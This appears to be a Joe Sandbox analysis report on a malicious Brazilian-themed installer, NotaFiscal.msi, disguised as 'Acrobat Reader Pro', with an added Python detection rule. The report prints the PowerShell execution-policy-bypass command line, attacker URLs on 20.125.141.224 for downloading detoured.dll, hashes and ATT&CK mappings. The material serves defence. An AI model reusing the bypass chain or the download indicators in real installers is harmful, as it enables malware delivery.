Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss846F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi846B.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr846C.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr846D.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue." (4 entries for this one process creation, two of them with the command line lowercased)
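The process creation above is the chain a detection engineer wants to catch: the Windows Installer service (msiexec.exe /V) runs custom actions in a MsiExec.exe -Embedding child, and that child starts powershell.exe with -ExecutionPolicy Bypass on a script dropped in the user's Temp directory (the -propFile/-scriptFile/-propSep/-testPrefix argument pattern matches the PowerShell custom-action wrapper used by Advanced Installer, whose URL is among the strings in the MSI). The following Python is an added example, not code from the report or from Joe Sandbox: it builds the process tree from constructed process-creation events and flags PowerShell launched under an installer ancestor with those flags. PIDs, images and command lines for the msiexec/powershell chain are taken from the report; the parent PIDs of the two root msiexec.exe instances, the conhost.exe PID and the Explorer-launched control event are assumptions.

```python
import re
from collections import defaultdict

# Constructed process-creation events modelled on the report's process list.
# The ppid of the two root msiexec.exe instances (3000, 700), the conhost.exe
# event and the explorer.exe control events are assumptions, not report data.
EVENTS = [
    {"pid": 4472, "ppid": 3000, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r'"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\NotaFiscal.msi"'},
    {"pid": 1396, "ppid": 700, "image": r"C:\Windows\System32\msiexec.exe",
     "cmdline": r"C:\Windows\system32\msiexec.exe /V"},
    {"pid": 5812, "ppid": 1396, "image": r"C:\Windows\SysWOW64\MsiExec.exe",
     "cmdline": r"C:\Windows\syswow64\MsiExec.exe -Embedding DE799B6D65FDD1EFF7D6ADCB97B743B3"},
    {"pid": 5896, "ppid": 5812,
     "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": (r'-NoProfile -Noninteractive -ExecutionPolicy Bypass '
                 r'-File "C:\Users\user\AppData\Local\Temp\pss846F.ps1" '
                 r'-propFile "C:\Users\user\AppData\Local\Temp\msi846B.txt" '
                 r'-scriptFile "C:\Users\user\AppData\Local\Temp\scr846C.ps1"')},
    {"pid": 6100, "ppid": 5896, "image": r"C:\Windows\System32\conhost.exe",
     "cmdline": r"\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"},
    # Control: a user running a Temp script from Explorer with the same flags.
    # Same command-line shape but no installer ancestor, so it must not fire.
    {"pid": 7000, "ppid": 2000, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 7100, "ppid": 7000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\fix.ps1"'},
]

# powershell.exe accepts unambiguous parameter prefixes, so -ep / -ex / -exec
# bypass are equivalent to -ExecutionPolicy Bypass and must be matched too.
BYPASS_RE = re.compile(r"-(?:executionpolicy|exec|ep|ex)\s+bypass\b", re.I)
# -File (or -f) pointing at a .ps1 under the user's Local\Temp directory.
TEMP_PS1_RE = re.compile(r'-f(?:ile)?\s+"?([^"\s]*\\AppData\\Local\\Temp\\[^"\s]+\.ps1)', re.I)
INSTALLER_HOSTS = {"msiexec.exe"}


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(pid: int, by_pid: dict) -> list:
    """[process, parent, grandparent, ...] as far as the event set knows it."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain


def detect_installer_powershell(events: list) -> list:
    """Flag powershell.exe with an execution-policy bypass on a Temp script
    that has msiexec.exe anywhere in its ancestry."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for ev in events:
        if basename(ev["image"]) != "powershell.exe":
            continue
        if not BYPASS_RE.search(ev["cmdline"]):
            continue
        script = TEMP_PS1_RE.search(ev["cmdline"])
        if not script:
            continue
        chain = ancestry(ev["pid"], by_pid)
        if not any(basename(a["image"]) in INSTALLER_HOSTS for a in chain[1:]):
            continue
        findings.append({
            "pid": ev["pid"],
            "script": script.group(1),
            "chain": " > ".join(basename(a["image"]) for a in reversed(chain)),
        })
    return findings


def render_tree(events: list) -> list:
    """Indented process tree, in the spirit of the report's behavior graph."""
    by_pid = {e["pid"]: e for e in events}
    children, roots = defaultdict(list), []
    for e in events:
        (children[e["ppid"]] if e["ppid"] in by_pid else roots).append(e)
    lines = []

    def walk(e, depth):
        lines.append("  " * depth + f"{basename(e['image'])} (PID {e['pid']})")
        for child in children[e["pid"]]:
            walk(child, depth + 1)

    for root in roots:
        walk(root, 0)
    return lines


if __name__ == "__main__":
    print("\n".join(render_tree(EVENTS)))
    for f in detect_installer_powershell(EVENTS):
        print(f"ALERT pid={f['pid']} chain={f['chain']} script={f['script']}")
```

The ancestry walk matters more than the command line: an MSI that runs PowerShell this way is not itself malicious (legitimate installers do it), but a PowerShell custom action that then fetches a payload from a bare IP is, so the rule is best used to enrich the process-creation event with the installer package path and let the network follow-up decide.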
Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation (2 occurrences)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information (GAC assemblies and a catalog file touched while the PowerShell host loads its modules):
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
  C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 occurrences)
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
  C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 occurrences)
  C:\ VolumeInformation
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 occurrences)
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
  C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (3 occurrences)
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
  C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
MITRE ATT&CK matrix (reconstructed from the flattened table; the number in brackets is the count of signatures mapped to that technique, techniques without a count had no hits):

Initial Access: Replication Through Removable Media [1]; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter [1]; PowerShell [1]; At (Linux); At (Windows); Cron; Launchd
Persistence: DLL Side-Loading [1]; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: Process Injection [11]; DLL Side-Loading [1]; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: Masquerading [22]; Virtualization/Sandbox Evasion [21]; Process Injection [11]; Obfuscated Files or Information [1]; DLL Side-Loading [1]; File Deletion [1]
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery [1]; Process Discovery [1]; Virtualization/Sandbox Evasion [21]; Application Window Discovery [1]; Peripheral Device Discovery [11]; System Information Discovery [12]
Lateral Movement: Replication Through Removable Media [1]; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data [1]; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Encrypted Channel [1]; Junk Data; Steganography; Protocol Impersonation; Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features
Behavior graph (ID 803452, sample NotaFiscal.msi, start date 10/02/2023, architecture WINDOWS, score 68), reconstructed from the flattened diagram text:

Sample-level signatures: Multi AV Scanner detection for submitted file; Yara detected Powershell download and execute; Yara detected MalDoc

msiexec.exe (started)
  dropped C:\Windows\Installer\6e7bc0.msi (Composite)
  dropped C:\Windows\Installer\MSI822E.tmp (PE32)
  dropped C:\Windows\Installer\MSI80D4.tmp (PE32)
  dropped 3 other files (none is malicious)
  -> msiexec.exe (started)
       dropped C:\Users\user\AppData\Local\...\scr846C.ps1 (Unicode)
       dropped C:\Users\user\AppData\Local\...\pss846F.ps1 (Unicode)
       signature: Bypasses PowerShell execution policy
       -> powershell.exe (started)
            network: 20.125.141.224, ports 49702 -> 80, MICROSOFT-CORP-MSN-AS-BLOCKUS, United States
            -> conhost.exe (started)
msiexec.exe (started; second top-level instance)

Source | Detection | Scanner | Label
NotaFiscal.msi | 16% | Virustotal |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
http://20.125.141.224/pro/ | 0% | Avira URL Cloud | safe
http://20.125.141.224/pro/$ProcName2 | 0% | Avira URL Cloud | safe
http://20.125.141.224/pro/detoured.dllx | 0% | Avira URL Cloud | safe
http://20.125.141.224/pro/detoured.dll6C.ps1 | 0% | Avira URL Cloud | safe
http://20.125.141.224/pro/$ProcName | 0% | Avira URL Cloud | safe
http://20.125.141.2244 | 0% | Avira URL Cloud | safe
http://20.125.141.224 | 0% | Avira URL Cloud | safe
http://20.125.14 | 0% | Avira URL Cloud | safe
http://20.125.141.224/pro/$ProcN | 0% | Avira URL Cloud | safe
            No contacted domains info
Several of the 20.125.141.224 entries below are memory-string fragments or run-together strings rather than distinct URLs (for example the "detoured.dll6C.ps1", "...141.2244" and "20.125.14" forms), and "$ProcName" is an unexpanded PowerShell variable from the dropped script scr846C.ps1, so the request path under /pro/ is completed at run time. The stable indicators are the host 20.125.141.224, the /pro/ path and the file name detoured.dll.

Name | Source | Malicious | Antivirus Detection | Reputation
http://20.125.141.224/pro/detoured.dll6C.ps1 | powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000003.00000002.400029001.0000000006481000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://20.125.141.224/pro/$ProcName2 | powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmp, NotaFiscal.msi, scr846C.ps1.2.dr, 6e7bc0.msi.1.dr | false | Avira URL Cloud: safe | unknown
http://20.125.141.224/pro/detoured.dllx | powershell.exe, 00000003.00000002.388596354.00000000056D0000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000003.00000002.388596354.000000000555A000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.thawte.com/cps0/ | NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.dr | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000003.00000002.388596354.000000000555A000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000003.00000003.369099618.0000000005E77000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.thawte.com/repository0W | NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.dr | false | | high
http://20.125.141.224/pro/ | powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000003.00000002.400029001.0000000006481000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000003.00000002.400029001.0000000006481000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000003.00000002.400029001.0000000006481000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000003.00000002.400029001.0000000006481000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://20.125.141.224/pro/$ProcName | powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmp, NotaFiscal.msi, scr846C.ps1.2.dr, 6e7bc0.msi.1.dr | false | Avira URL Cloud: safe | unknown
https://www.advancedinstaller.com | NotaFiscal.msi, MSI80D4.tmp.1.dr, MSI7FD8.tmp.1.dr, MSI7E7F.tmp.1.dr, 6e7bc0.msi.1.dr, MSI822E.tmp.1.dr, MSI8075.tmp.1.dr | false | | high
http://20.125.141.2244 | powershell.exe, 00000003.00000002.388596354.0000000005764000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://20.125.141.224 | powershell.exe, 00000003.00000002.388596354.000000000575B000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000003.00000002.388596354.0000000005421000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://20.125.141.224/pro/$ProcN | powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000003.00000002.388596354.000000000555A000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://20.125.14 | powershell.exe, 00000003.00000002.388596354.0000000005690000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
IP | Domain | Country | ASN | ASN Name | Malicious
20.125.141.224 | unknown | United States | 8075 | MICROSOFT-CORP-MSN-AS-BLOCKUS | false
                            Joe Sandbox Version:36.0.0 Rainbow Opal
                            Analysis ID:803452
                            Start date and time:2023-02-10 00:59:09 +01:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 6m 59s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:16
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample file name:NotaFiscal.msi
                            Detection:MAL
                            Classification:mal68.troj.evad.winMSI@7/30@0/1
                            EGA Information:Failed
                            HDC Information:Failed
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 55
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Found application associated with file extension: .msi
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                            • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, ctldl.windowsupdate.com
                            • Execution Graph export aborted for target powershell.exe, PID 5896 because it is empty
                            • Not all processes where analyzed, report is missing behavior information
Time | Type | Description
01:00:53 | API Interceptor | 27x Sleep call for process: powershell.exe modified
                            No context
                            No context
Match | Associated Sample Name / URL | Detection | Context (IP)
MICROSOFT-CORP-MSN-AS-BLOCKUS:
  file.exe | malicious | 40.93.207.1
  file.exe | malicious | 40.93.212.0
  file.exe | malicious | 40.93.207.5
  file.exe | malicious | 40.93.212.0
  http://us.content.exclaimer.net/?url=https://doroyhpet1.com/now/new/Stepan/dclayton@stepan.com | malicious | 13.107.237.60
  #Ud83d#Udce7#U2122 EFT Doc-7-02-2023.html | malicious | 13.107.237.60
  file.exe | malicious | 40.93.207.1
  file.exe | malicious | 40.93.207.5
  file.exe | malicious | 40.93.212.0
  #Ud83d#Udcd1Monthly Payable.htm | malicious | 13.107.253.60
  file.exe | malicious | 40.93.212.0
  http://us.content.exclaimer.net/?url=https://isisindigo.com/auth/new/Draper/jrooney@draper.com | malicious | 13.107.237.60
  file.exe | malicious | 104.47.54.36
  https://seligsonrothmanandrothman-my.sharepoint.com/:o:/g/personal/ilan_srrlaw_com/Em-FPe-yZmlIjix1Jz8NZE8BeEsuzCvOmDAyhcmXwLO_dw?e=5%3ard841M&at=9 | malicious | 13.107.237.60
  file.exe | malicious | 40.93.212.0
  https://ffm.bio/5pnnqka | malicious | 13.107.237.45
  file.exe | malicious | 40.126.31.71
  file.exe | malicious | 40.93.207.5
  #Ud83d#Udcd1Monthly Payable.htm | malicious | 13.107.238.45
  file.exe | malicious | 40.93.212.0
                            No context
Match | Associated Sample Name / URL | Detection
C:\Windows\Installer\MSI7E7F.tmp:
  radarinstaller.exe | malicious
  radarinstaller.exe | malicious
  Danfe2372342.msi | malicious
  Danfe2372342.msi | malicious
  id-Processo_Z5TGVQUK.msi | malicious
  id-Processo_Z5TGVQUK.msi | malicious
                                        Process:C:\Windows\System32\msiexec.exe
                                        File Type:data
                                        Category:modified
                                        Size (bytes):1140
                                        Entropy (8bit):5.503521595678661
                                        Encrypted:false
                                        SSDEEP:24:/Bd4DOjSt6Y4fbDdsgfBcAefPpUC+AYoeDXYDhiSWILshW+AZ:/r4DO+sY4j7XeZJbwYD8SJLAWbZ
                                        MD5:C0E9D26AF1810421F3644898CDCEB43A
                                        SHA1:921BD1D92F664558BB9F2E140E276A1814D1A57C
                                        SHA-256:D370C79F8636DFAFC58A540A6B6828CAA11A3B8A1CD28BD18272EB344E9EE6BB
                                        SHA-512:90011537D4630BAC40B4292FD635231992FAC9B3821440A67501696DF11D9998E889A8758A901FA465FC3EF5018A784C65D3C9EE4CFBF022B4A9C469FEDD07F8
                                        Malicious:false
                                        Reputation:low
                                        Preview:...@IXOS.@.....@+.JV.@.....@.....@.....@.....@.....@......&.{8150EFD5-A4CB-41EF-AEB7-15BC9E7F8D67}..Acrobat Reader Pro..NotaFiscal.msi.@.....@...u.@.....@........&.{819D06D6-E0AA-46C4-91C3-F6F4E17BC272}.....@.....@.....@.....@.......@.....@.....@.......@......Acrobat Reader Pro......Rollback..Rolling back action:....RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{FC03EAC5-BA1F-49E5-8B24-3726A9E0E236}&.{8150EFD5-A4CB-41EF-AEB7-15BC9E7F8D67}.@......&.{36C855C3-CBFC-424F-AA15-7C4DDD8F3200}&.{8150EFD5-A4CB-41EF-AEB7-15BC9E7F8D67}.@......&.{F097E14A-4458-4E96-8676-952F7577E3C6}&.{8150EFD5-A4CB-41EF-AEB7-15BC9E7F8D67}.@........CreateFolders..Creating folders..Folder: [1]#.3.C:\Program Files (x86)\2125.651\Acrobat Reader Pro\.@....#.,.C.:.\.U.s.e.r.s.\.P.u.b.l.i.c.\.D.e.s.k.t.o.p.\.M.o.d.u.l.o. .d.e. .S.e.g.u.r.a.n...a.\..@........WriteRegistryValues..Writing system registry values..Key: [1], Name: [2], Value: [3]$..@....$.Software\2
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):8003
                                        Entropy (8bit):4.839308921501875
                                        Encrypted:false
                                        SSDEEP:192:yxoe5oVsm5emdVVFn3eGOVpN6K3bkkjo59gkjDt4iWN3yBGHh9smidcU6CXpOTik:DBVoGIpN6KQkj2Wkjh4iUx0mib4J
                                        MD5:937C6E940577634844311E349BD4614D
                                        SHA1:379440E933201CD3E6E6BF9B0E61B7663693195F
                                        SHA-256:30DC628AB2979D2CF0D281E998077E5721C68B9BBA61610039E11FDC438B993C
                                        SHA-512:6B37FE533991631C8290A0E9CC0B4F11A79828616BEF0233B4C57EC7C9DCBFC274FB7E50FC920C4312C93E74CE621B6779F10E4016E9FD794961696074BDFBFA
                                        Malicious:false
                                        Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):19048
                                        Entropy (8bit):5.289710643417081
                                        Encrypted:false
                                        SSDEEP:384:VteJAtREI18+AQTnQ/chseVbhgW7R7IUZBlejsIj598zv:7W2Q/WseVbhgW7RUGlW9+v
                                        MD5:B63B78C565D23BF1867A4BB635521C47
                                        SHA1:3D117BFFECBA94D9A6460C298F42442BD3787931
                                        SHA-256:608F438624D2BDE2E49D0E09E8EA54D40187B5EDDF3F00AE6BB9B097C3E9689B
                                        SHA-512:28D1EA92E23114302C4F56FF0859D999A4C2151D4219A632896CF65F7DB8A547E628C7C5E14B80DDED3C8F8883FDD1797C1EEE78837CD0612865DD97018F250F
                                        Malicious:false
                                        Preview:@...e...........K.........a...y.......4..............@..........D...............fZve...F.....x.)........System.Management.AutomationH...............<@.^.L."My...:)..... .Microsoft.PowerShell.ConsoleHost4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):104
                                        Entropy (8bit):4.560994822233001
                                        Encrypted:false
                                        SSDEEP:3:RrwNFRJ9fVl3HY9lFFH7uFYLhOw4yHXWS:RrwXz9fVBYtFH7uFYVKy39
                                        MD5:1DEC3D564DAC6CD61D3103715C22F2AF
                                        SHA1:25E9301692C92984B77B14A103D516B7A13BD358
                                        SHA-256:85CA620ED18F11871B60880FF3BD70088096B272A8DDB5B17F9BA17A722A6E4E
                                        SHA-512:A378CA062255BA78429476B6241BEFB947F9FD747CBBA98B049A2BE1FBD2774EB60A6C535DE86310B094080929F270059BB464E50DA0C521996FE5C6882E48B6
                                        Malicious:false
                                        Preview:ERROR: Exception calling "DownloadFile" with "2" argument(s): "Unable to connect to the remote server"..
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1
                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:very short file (no magic)
                                        Category:dropped
                                        Size (bytes):1
                                        Entropy (8bit):0.0
                                        Encrypted:false
                                        SSDEEP:3:U:U
                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                        Malicious:false
                                        Preview:1
                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):6668
                                        Entropy (8bit):3.5127462716425657
                                        Encrypted:false
                                        SSDEEP:96:5Wb5VNkKmeHn/V2BVrIovmgNlGjxcj6BngOcvjb:5WbyZ/gVyvb
                                        MD5:30C30EF2CB47E35101D13402B5661179
                                        SHA1:25696B2AAB86A9233F19017539E2DD83B2F75D4E
                                        SHA-256:53094DF6FA4E57A3265FF04BC1E970C10BCDB3D4094AD6DD610C05B7A8B79E0F
                                        SHA-512:882BE2768138BB75FF7DDE7D5CA4C2E024699398BAACD0CE1D4619902402E054297E4F464D8CB3C22B2F35D3DABC408122C207FACAD64EC8014F2C54834CF458
                                        Malicious:true
